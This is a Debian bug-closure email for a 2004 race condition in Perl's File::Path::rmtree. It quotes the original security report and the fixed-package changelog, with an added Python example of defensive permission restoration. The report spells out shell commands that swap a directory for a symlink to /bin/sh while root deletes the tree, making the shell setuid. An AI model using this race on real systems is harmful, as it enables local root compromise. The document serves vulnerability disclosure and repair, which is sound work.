Your message dated Fri, 09 Jan 2009 01:52:21 +0000
with message-id <e1ll6xt-0006a4...@ries.debian.org>
and subject line Bug#286905: fixed in perl 5.8.8-7etch5
has caused the Debian Bug report #286905,
regarding perl-modules: File::Path::rmtree makes setuid
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
286905: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=286905
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole
Noting USN-44-1 e.g. in
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html
I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:
(undef, undef, my $rp) = lstat $root or next;
$rp &= 07777;   # don't forget setuid, setgid, sticky bits
if ( -d _ ) {
...
    if (rmdir $root) {
        ++$count;
    }
    else {
        carp "Can't remove directory $root: $!";
        chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root))
            or carp("and can't restore permissions to "
                    . sprintf("0%o",$rp) . "\n");
    }
}
...
Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:
mkdir -p /tmp/psz/sh
perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)'
chmod 4777 /tmp/psz/sh
While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:
mv /tmp/psz/sh /tmp/psz/dummy
ln -s /bin/sh /tmp/psz/sh
Root would have recorded the permissions of /tmp/psz/sh, but would
"restore" it to /bin/sh.
I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.
(A few minutes ago I emailed the File::Path authors tim.bu...@ig.co.uk
and bai...@newman.upenn.edu; Tim.Bunce bounced.)
Cheers,
Paul Szabo - p...@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C
Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction
--- End Message ---
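The defect in the report above is a time-of-check/time-of-use race: rmtree records a directory's mode with lstat, and later restores it with chmod by path name, which follows symlinks, so a directory swapped for a symlink in between gets the saved mode applied to the link's target. The following is an added example, written for this page in Python rather than Perl so that it runs as-is; it is not code from the bug report, from File::Path, or from the Debian fix. It shows the defensive pattern: record the directory's (st_dev, st_ino) identity along with its mode, and restore the mode only through a descriptor opened with O_NOFOLLOW and O_DIRECTORY whose fstat still matches that identity. The function names (record_dir_identity, restore_dir_perms, demo) and the scenario built under a temporary directory are constructed for the example; "sh" and "target" stand in for the report's /tmp/psz/sh and /bin/sh.

```python
import os
import stat
import tempfile


def record_dir_identity(path):
    """What rmtree records before descending: the directory's permission bits,
    plus its (st_dev, st_ino) identity so the same object can be recognised
    later. lstat is used so a symlink at this path is seen as a symlink."""
    st = os.lstat(path)
    if not stat.S_ISDIR(st.st_mode):
        raise NotADirectoryError(path)
    return st.st_dev, st.st_ino, stat.S_IMODE(st.st_mode)


def restore_dir_perms(path, dev, ino, mode):
    """Restore a saved mode only to the directory that was originally examined.

    chmod(path, mode) resolves symlinks, so if the directory has been replaced
    by a symlink in the meantime the mode lands on the link's target. Instead:
    open with O_NOFOLLOW (a symlink makes the open fail with ELOOP) and
    O_DIRECTORY (a plain file fails with ENOTDIR), confirm via fstat that the
    opened object is still the inode recorded earlier, and apply the mode
    through the descriptor with fchmod. Returns True if the mode was restored,
    False if the path no longer refers to the original directory."""
    flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
    try:
        fd = os.open(path, flags)
    except OSError:
        return False
    try:
        st = os.fstat(fd)
        if (st.st_dev, st.st_ino) != (dev, ino):
            return False
        os.fchmod(fd, mode)
        return True
    finally:
        os.close(fd)


def demo():
    """Constructed scenario (hypothetical, not taken from the report): a
    directory is examined, then swapped for a symlink to a regular file before
    its permissions are restored. Returns the outcome of each restore attempt."""
    with tempfile.TemporaryDirectory() as top:
        target = os.path.join(top, "target")        # stands in for /bin/sh
        with open(target, "w") as f:
            f.write("placeholder file, not a shell\n")
        os.chmod(target, 0o644)

        victim = os.path.join(top, "sh")            # stands in for /tmp/psz/sh
        os.mkdir(victim)
        os.chmod(victim, 0o700)
        dev, ino, mode = record_dir_identity(victim)

        # The swap that happens between the lstat and the chmod in the report.
        moved = os.path.join(top, "dummy")
        os.rename(victim, moved)
        os.symlink(target, victim)

        # The guarded restore refuses: the path is now a symlink, not our inode.
        swapped_refused = not restore_dir_perms(victim, dev, ino, mode)
        target_untouched = stat.S_IMODE(os.lstat(target).st_mode) == 0o644

        # The real directory, wherever it was moved, is still the recorded
        # inode, so its mode can be put back even after the tree was touched.
        os.chmod(moved, 0o500)
        intact_restored = (restore_dir_perms(moved, dev, ino, mode)
                           and stat.S_IMODE(os.lstat(moved).st_mode) == mode)

    return {
        "swapped_refused": swapped_refused,
        "target_untouched": target_untouched,
        "intact_restored": intact_restored,
    }


if __name__ == "__main__":
    print(demo())
```

The point of the design is that the permission fix-up never goes through a path name once a lookup may have been redirected. O_NOFOLLOW alone stops the symlink case from the report; the (st_dev, st_ino) comparison additionally covers an attacker who replaces the directory with a different directory rather than a link, which is why the identity is recorded together with the mode rather than re-derived at restore time.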
--- Begin Message ---
Source: perl
Source-Version: 5.8.8-7etch5
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive:
libcgi-fast-perl_5.8.8-7etch5_all.deb
to pool/main/p/perl/libcgi-fast-perl_5.8.8-7etch5_all.deb
libperl-dev_5.8.8-7etch5_i386.deb
to pool/main/p/perl/libperl-dev_5.8.8-7etch5_i386.deb
libperl5.8_5.8.8-7etch5_i386.deb
to pool/main/p/perl/libperl5.8_5.8.8-7etch5_i386.deb
perl-base_5.8.8-7etch5_i386.deb
to pool/main/p/perl/perl-base_5.8.8-7etch5_i386.deb
perl-debug_5.8.8-7etch5_i386.deb
to pool/main/p/perl/perl-debug_5.8.8-7etch5_i386.deb
perl-doc_5.8.8-7etch5_all.deb
to pool/main/p/perl/perl-doc_5.8.8-7etch5_all.deb
perl-modules_5.8.8-7etch5_all.deb
to pool/main/p/perl/perl-modules_5.8.8-7etch5_all.deb
perl-suid_5.8.8-7etch5_i386.deb
to pool/main/p/perl/perl-suid_5.8.8-7etch5_i386.deb
perl_5.8.8-7etch5.diff.gz
to pool/main/p/perl/perl_5.8.8-7etch5.diff.gz
perl_5.8.8-7etch5.dsc
to pool/main/p/perl/perl_5.8.8-7etch5.dsc
perl_5.8.8-7etch5_i386.deb
to pool/main/p/perl/perl_5.8.8-7etch5_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 286...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Niko Tyni <nt...@debian.org> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Thu, 20 Nov 2008 22:45:54 +0200
Source: perl
Binary: perl-base libcgi-fast-perl libperl-dev perl-debug perl-modules perl libperl5.8 perl-suid perl-doc
Architecture: source i386 all
Version: 5.8.8-7etch5
Distribution: stable-security
Urgency: high
Maintainer: Brendan O'Dea <b...@debian.org>
Changed-By: Niko Tyni <nt...@debian.org>
Description:
libcgi-fast-perl - CGI::Fast Perl module
libperl-dev - Perl library: development files
libperl5.8 - Shared Perl library
perl - Larry Wall's Practical Extraction and Report Language
perl-base - The Pathologically Eclectic Rubbish Lister
perl-debug - Debug-enabled Perl interpreter
perl-doc - Perl documentation
perl-modules - Core Perl modules
perl-suid - Runs setuid Perl scripts
Closes: 286905 286922
Changes:
perl (5.8.8-7etch5) stable-security; urgency=high
.
* SECURITY [CAN-2005-0448]: re-rewrite File::Path::rmtree to avoid race
condition which allows an attacker with write permission on
directories in the tree being removed to make files setuid or to
remove arbitrary files (Closes: #286905, #286922).
.
The race condition was fixed in 5.8.4-7 but re-introduced in 5.8.8-1.
Files:
a57837967b7420057558cab7efca9202 750 perl standard perl_5.8.8-7etch5.dsc
cfd4c3d27c5a7a342c441383867dae89 105052 perl standard perl_5.8.8-7etch5.diff.gz
9dfa8758852aadcaadb2edbdfa17f942 41082 perl optional libcgi-fast-perl_5.8.8-7etch5_all.deb
3baade38d4a703ae7db0e2f7d7b2df62 7378812 doc optional perl-doc_5.8.8-7etch5_all.deb
dc45e7d6fbedf992db42f31326457df2 2316518 perl standard perl-modules_5.8.8-7etch5_all.deb
40254226d8ae5963a908661350816f0c 762200 perl required perl-base_5.8.8-7etch5_i386.deb
7149381d9862cc1ebd20092fae76dda9 2491980 perl optional perl-debug_5.8.8-7etch5_i386.deb
59d70d1ee4f0e7584230095ca079ceb7 32070 perl optional perl-suid_5.8.8-7etch5_i386.deb
c511226a2cbddb98a170c8f563d6670a 527162 libs optional libperl5.8_5.8.8-7etch5_i386.deb
f3f34d325de643667d4c12f897a15f48 585396 libdevel optional libperl-dev_5.8.8-7etch5_i386.deb
bdcb99ed51d06b1639d98a661ce42d58 3589118 perl standard perl_5.8.8-7etch5_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkkxTPsACgkQiyizGWoHLTn0OgCdGI24OjO5S7gb+Vh2qRcSOJYL
U7gAnRXL7Wbcotrdf0cWNYj4zbMweEj5
=8aRt
-----END PGP SIGNATURE-----
--- End Message ---